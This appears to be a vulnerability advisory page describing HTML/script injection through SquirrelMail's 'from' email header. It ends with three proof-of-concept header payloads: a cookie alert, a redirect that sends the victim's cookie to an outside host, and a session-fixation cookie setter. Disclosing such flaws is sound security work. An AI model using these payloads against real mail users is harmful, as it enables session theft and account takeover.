SquirrelMail 'from' Field Email Header HTML Injection Vulnerability

vendor:

SquirrelMail

by:

Unknown

7.5

CVSS

HIGH

HTML Injection

CWE

Product Name: SquirrelMail

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:squirrelmail:squirrelmail

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

SquirrelMail ‘from’ Field Email Header HTML Injection Vulnerability

The vulnerability allows an attacker to inject malicious HTML code into the 'from' field email header, potentially leading to unauthorized access to user's cookie-based authentication credentials and disclosure of personal email. Other attacks are also possible.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to implement input sanitization and validation mechanisms to prevent HTML injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10450/info

SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings.

An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible. 

From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>

From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>

From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><>